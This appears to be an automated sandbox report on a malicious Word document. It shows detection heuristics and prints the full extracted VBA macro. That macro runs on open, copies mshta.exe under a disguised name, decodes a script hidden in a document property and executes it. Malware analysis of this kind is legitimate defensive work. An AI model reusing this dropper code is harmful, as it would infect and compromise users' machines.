MALICIOUS
138
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Call CreateObject("ws" + aje27 + "ell").run(aoreOS) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
aGuh3s = Environ(aRsKA) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11559 bytes |
SHA-256: 39aa0761fc4151611a4ccb50e86a2e48cb1fbaeaaa9d140791f584b9c3efbf09 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aUDBnA"
Sub AutoOpen()
' Inopportune sunflower lombard palace fbi deg. chips
aployB
End Sub
Attribute VB_Name = "acqdb"
Public Const ahMSqv As String = ""
Public Const aatOM As Integer = -477 + 490
Public Const adYvTP As String = "1ridn1iw1"
Public Const aBI0g As String = "231met1sys1"
Public Const a9dGM As String = "p1m1e1t"
Public Const aje27 As String = "cript.sh"
Function amwkGN()
End Function
Sub aopMG(aNvEel)
' Pete intention
' Copyright annually abler vengeful barter
' Confident cashed writes
' Barter unscathed
' Wang ac rebound encyclopedia
' Hearsay morocco aquarium arabic drawl
' Hamburg mediterranean isle giuseppe yugoslavia
' Str impolite incoming adapt
' Stick unformed
' Allowing blasphemy mel des
' Counselor transexual aggressor tuition embankment jackie tub
' Ended ravish coterie dock
' Shiny mother-in-law blowjob
End Sub
Function aMbG75(azh0Jn)
' Obliterate scores sudden cameron
' Colleague
' Implied possible invoice devel
' Contain inertia
' Unseemly
' U plenary
' Convocation weddings excerpt contrariwise
' Simulations wyoming avoid
' Divisible inelegant
' Annul anthea toilsome friesland emotionally immeasurable
aMbG75 = ActiveDocument.BuiltInDocumentProperties(azh0Jn)
End Function
Public Sub aLCU5H()
' Authorized myers est com
' Dens
' Planetary selling hove
' Helter-skelter brigantine biology
' Convene transparent colossus clip
' Conferences investing potentate beneficial reflex
' S hourly legs precious
' Toys payable pyre neither admin service incorporation
' U
' Exigency broker climb skills
' Cause repository already
aEHQS
End Sub
Public Sub aP9tT()
a4dK9
End Sub
Attribute VB_Name = "agOb5r"
Public Function aY8pM(aqktzX, ahdO7)
' Phone fere insinuation specialists
' Taut gunner sweden beleaguered camera
' Yoga
' Ethics
' Sample ilo
' Funk Word rfc blood profanity
' Imposes approve churchman
' Riverside
' Douglas di laity inequalities
' Final elevator berkshire waylaid
' Limitation characterise agitating utah motorola
' Debasement reprisal ammonium
' Crestfallen sundown ungenerous
' Celibacy joshua allie lamentation
' Copied associated abomination clean sip
' Approval conservation beleaguered sector assets appeals
' Casinos dangle unload
' Approved sleet thehun
' Defilement performances beginning
' Burke sell barbaric afire ex- freemen hughes
' Submission
' Insulin median preventive
' Arrivals foggy
' Beginners tress lands mush sandal
' Versus isis disembodied
' Surely amber
' Flawless metals implacable boulder
' Assay
' Inopportune lesions hear
' Reserve aids
' Protuberance commented chafe
' Radios holdings specification
' Chosen predominance consanguinity
' Inventive meets infinite torah
' Walker
' Dimple reforms stories jacky
' Glow educational
' Commissioners drawn cottage
' Adherence wax sausage etymology
' Promoted joyously awe-inspiring peripheral
' Discussing cherubs switch vary
' Antipathy magisterial jumble staff
' Topeka broadside
FileNumber = FreeFile
Open aqktzX For Output As #FileNumber
' Turbulence hindrance moon connection exceptionally beeves meter
' Burn amethyst measurement
' Itunes brass ochre nether dropped
' Courts hankering
' Reno cad ultimatum ornate remedies
' Crm sentient wondering
' Dynamic german childlike vindicate commemoration windlass
' Inaccuracy ejaculation lakes
' Warriors normal crowd ferment
' Albania concise bus
' Whichever necklace propagate oriental late
' Decorative
Print #FileNumber, ahdO7
' Argued
' Lynching arid
' Glean feat. ave colombia
' Mrna inaudible television agog sophistry
' Actuated assortment hiv offense
' Departures researcher ne adhesive thered groove
' Commentary foundations virtual optional
' Hebrides liberal shield phrases duplicate
' Paramount scapegrace
' Examine categories archived marriage masonic locking
' First gavin lattice ranked disparaging counts
Close #FileNumber
End Function
Sub ausmp(ao41zm, aJLqIz)
' Pater configurations
' Falls act. stellar octagonal
' Emigrant mentioned tiara nvidia
' Movers
' Cloudy flagrant
' Calvin racial attested
' Wiley spoor excess tithe analytical
' Unitarian
' Husbandry snapshot directly sprite
' Colon pilot suavity
' Tubular
' Liberia programmes interrogation alice yellowish consumes unforeseen
' Alison khartoum
' Argued dont
' Anointing caretaker
' Scaffolding slovak tumor digger
' Gambler alligator
' Inauspicious slide discussed mu
' Conjunction embodiment remnants terrain
' Indicator interventions acquit
' Capitulation significance
' Follower minneapolis casey salvador
' Bow chunk sal
' Bailiff
FileCopy ao41zm, aJLqIz
End Sub
Function aX4796(adtILM)
' Additional widespread plum rampant implies frequent
' Prettier bathroom ncaa
' Digs flights archives
' Griffiths
' Vegetarian ltd. frenchwoman gypsy
' Bolivia devious courtier
' Yeast rights notes
' Taught partnerships
' Clara disgorge brutish
' Uni disability
' Author investigators lavender
aX4796 = adtILM
End Function
Function aWxHY7(adtILM) As String
Dim aimjJ As Long
Dim aSoTk As Integer
Dim aLwqG As Integer
For aimjJ = 1 To Len(adtILM)
aLwqG = 0
aMUSz = Mid(adtILM, aimjJ, 1)
aSoTk = Asc(aMUSz)
If (aSoTk > ah1qoe(19699 / 19699) And aSoTk < ah1qoe(15496 / 7748)) Or (aSoTk > ah1qoe(-4252 + 4255) And aSoTk < ah1qoe(15092 / 3773)) Then
aLwqG = aatOM
aSoTk = ai5rZ(aSoTk, aLwqG)
If aSoTk < ah1qoe(5) And aSoTk > 83 Then
aSoTk = akTyB(aSoTk)
ElseIf aSoTk < 15860 / 244 Then
aSoTk = akTyB(aSoTk)
End If
End If
aK27F = aenQp(aSoTk)
Mid$(adtILM, aimjJ, 1) = aX4796(aK27F)
Next aimjJ
aWxHY7 = adtILM
End Function
Attribute VB_Name = "aDcPa9"
Function aFpQy(aKo0j)
' Cop move vanishing
' Largest dresses overseas spanking presumably discount
' Duplicate eminem paraphrase
' Ark. including
' Revoke challenge philanthropy ilo manger conduit
' Bbc experiences established operating comments
' Sony lg
' Retracted
' Portrayal af
' Twang liveliness ca dee counterpart ati
aLkFp = aKo0j
acNy7 = Len(aLkFp)
For avVFH = 0 To acNy7 - 1
' Lawlessness cliff fag avalanche resident
' Ultimate vibrating kit laundry
' Ball skype
' Extricate jose aqua
' Land background mississippi
' Furthermore bm hey ganymede dealers loops
' Demonstration gang pension agreement weekend
' Un cancer graduate laura
' Carnivorous drier vagaries sacerdotal
' Dui rejoinder contamination absolute
' Mica execrable fend demise target
' Therell suppliers ashley
' Pore ia
' Booking indonesian awe-struck fader
' Albania
' Bouquet thermal feud
' Professional slavish convertible
' September
' Flux candles turban rebuff
' Vic
' Smoking south consciousness
' Intermittently
ab04V = ab04V & Mid(aLkFp, (acNy7 - avVFH), 1)
Next avVFH
' Trustee brunei jade advisors
aFpQy = ab04V
End Function
Public Function a4CtfX(afPSA)
a4CtfX = Replace(afPSA, ahMSqv, "")
End Function
Sub aployB()
' Despite stuffing
' Iodine periods
' Swain obliterate
' Fund untidy
' Harried wrestling sediment
' Illiterate reactionary garlic comparison
' Opal swineherd adelaide duo atone epistolary
' Sex operates dionysus violent
' Feldspar declination viscid failed belle athwart
' Contemn
' Embankment conciliate protein charger
' Rebate operates trustees wider immature
' Extradition butler robertson
' Collectibles midwest nativity epidemic mitigation nazareth
' Leviticus rosa mischance extradition
' Upon beatles angler
' Brogue contrariwise exhalation
' Baker lathe armenia boating pokemon
' Shopzilla brighton
' Schema babel psp
' Incorrigible ner debauch citations
' Roma interpose
aLCU5H
' Hungary gpl preside
' Presuppose ml
' Interfaces
' Tying melee vulture letting
' Undermine frankincense rampart birthright
' Wp fran license
' Jocose scouting
' Quizzical reactions
' Bunch cans offal expected aggressively
' Needle developments los
aP9tT
' Clog combat craftsmen ablest cluster bulkhead forty-six
' Operative relative stitching
' Landing announcements wherever decorative
' Egregious lancaster
' Experiencing hilton
' Verandah anglia exterior chancellor probe frankfurt
' Funk
' Charlatan smoky cultural
' Racket hits breech oughtnt
' Welcoming tabooed
' Introduced outreach survivors tenure
Call CreateObject("ws" + aje27 + "ell").run(aoreOS)
End Sub
Attribute VB_Name = "af2Ph"
Function aGuh3s(aRsKA)
aGuh3s = Environ(aRsKA)
End Function
Function aXsbTA()
With Application
aXsbTA = .PathSeparator
End With
End Function
Function aWYGy(al7pe)
aXYq8 = VBA.Split(aFpQy("lmth.ni|moc.ni|exe.athsm"), "|")
' Beta guild same cruiser
' Cropped warrior sf love-making maple depict
' Poet arrangement
' Impacts potassium mistakes slit
' Emporium dump
' Celebrities cop
' Steak indianapolis
' Buildings exemplify tonnage alicia
' Experiment buffet campaign heady electronic
' Confidential unknown tile
' Motif wounding detect
Select Case al7pe
' Compliance
Case 0:
aWYGy = aGuh3s(Replace(aFpQy(adYvTP), "1", "")) & aXsbTA & Replace(aFpQy(aBI0g), "1", "") & aXsbTA & aXYq8(0)
Case 1:
' Control iceberg beatitude
' Fiftieth
' Computation criminal
' Adventures in-
' Scenario providing paddy
' Delivering mauritania profit
' Rob fans politically
' Dispirited postposted
' Artifice weapons
' Resolutions diane prescription
aWYGy = aGuh3s(Replace(aFpQy(a9dGM), "1", "")) & aXsbTA & aXYq8(1)
Case 2:
aWYGy = aGuh3s(Replace(aFpQy(a9dGM), "1", "")) & aXsbTA & aXYq8(2)
End Select
End Function
Sub a4dK9()
a8meF = afJCN(aWYGy(2))
aY8pM a8meF, aWxHY7(aMbG75("category"))
End Sub
Attribute VB_Name = "asIeS6"
Function a73UCo(auKDTZ)
a73UCo = (a4CtfX(auKDTZ))
End Function
Function aMXuz(aNgtm)
aMXuz = (a4CtfX(aNgtm))
End Function
Function afJCN(azBsq)
' Holland counts nt peru regional
' Denomination structural disclose collar fad unimpeachable
' Verandah definitions vedic worked hazard
' Cyprus
' Blaspheme hamilton
' Ostend states proposals
' Ridiculing ones handmade compromise
' Sacrilegious techno trailers regal
' Skills basement leeds
' Stipend massage tepid
afJCN = (a4CtfX(azBsq))
End Function
Function aoreOS()
aicZz = aMXuz(aWYGy(1))
aNThWL = afJCN(aWYGy(2))
aoreOS = aicZz & " " & aNThWL
End Function
Attribute VB_Name = "avDr2"
Sub aEHQS()
aC98Qs = a73UCo(aWYGy(0))
aFuoZc = aMXuz(aWYGy(1))
ausmp aC98Qs, aFuoZc
End Sub
Function akTyB(aPwpCh)
akTyB = aPwpCh + -878 + 904
End Function
Function ah1qoe(a9oAfg)
If a9oAfg = 0 Then
ah1qoe = 27251 / 27251
ElseIf a9oAfg = 1 Then
ah1qoe = -342 + 406
ElseIf a9oAfg = 2 Then
ah1qoe = -240 + 331
ElseIf a9oAfg = 3 Then
ah1qoe = 165 - 69
ElseIf a9oAfg = 4 Then
ah1qoe = 6 + 117
ElseIf a9oAfg = 5 Then
ah1qoe = 269 - 172
Else
ah1qoe = 32 * 32
End If
End Function
Function ai5rZ(aPwpCh, ax3mlO)
ai5rZ = aPwpCh - ax3mlO
End Function
Function aenQp(aPwpCh)
aenQp = VBA.ChrW(aPwpCh)
' Pali lichen odd chapel inhale
' Auburn component godhead modular pestilent
' Label quire
' Dylan claims nutter
' Creak ext
' Plus
' Surplus pharmacies
' Source quad hey dote
' Ostracism translator greater
' Evolution volvo milky languorous
' Security committees corporate questionable honor qualification
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 48640 bytes |
SHA-256: 6eb2596f7beb27bfd3eadf12563cd8cd7c0d455e7e13ea9fbba2ffacde029310 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.